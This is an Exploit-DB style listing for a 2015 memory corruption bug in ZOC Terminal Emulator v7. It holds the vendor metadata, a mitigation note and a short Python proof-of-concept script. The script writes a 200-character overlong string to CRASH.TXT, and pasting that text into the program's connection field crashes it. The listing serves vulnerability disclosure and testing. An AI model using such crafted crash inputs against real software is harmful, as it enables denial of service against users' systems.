ZOC Terminal Emulator-v7 Memory Corruption PoC

vendor:

ZOC Terminal Emulator

by:

SATHISH ARTHAR

7.5

CVSS

HIGH

Memory Corruption

119

CWE

Product Name: ZOC Terminal Emulator

Affected Version From: v7

Affected Version To: v7

Patch Exists: YES

Related CWE: N/A

CPE: a:emtec:zoc_terminal_emulator

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXp/Windows7/windows8

2015

ZOC Terminal Emulator-v7 Memory Corruption PoC

A PoC for a memory corruption vulnerability in ZOC Terminal Emulator-v7. The vulnerability can be exploited by copying the content of a specially crafted file (CRASH.TXT) into the 'Connect to' option and setting the Connection type to Windows Modems.

Mitigation:

Update to the latest version of ZOC Terminal Emulator-v7.

Source

Exploit-DB raw data:

#!/usr/bin/python

#[+] Author: SATHISH ARTHAR
#[+] Exploit Title:  ZOC Terminal Emulator-v7 Memory Corruption PoC
#[+] Date: 14-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows7/windows8 
#[+] Vendor: http://www.emtec.com
#[+] Download: http://www.emtec.com/downloads/zoc/zoc7051.exe
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks:   offensive security (@offsectraining)

 

print"###########################################################"
print"#  Title: ZOC Terminal Emulator-v7  Memory Corruption PoC  #"
print"#  Author: SATHISH ARTHAR                                  #"
print"#  Category: DoS/PoC                                       # "
print"###########################################################"
print"Copy the content of CRASH.TXT in connect to option and set Connection type to Windows Modems"
print" Quick Connection ----> Connection type: Windows Modems ----> connect" 


crash= "A" * 200	
filename = "CRASH.TXT"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()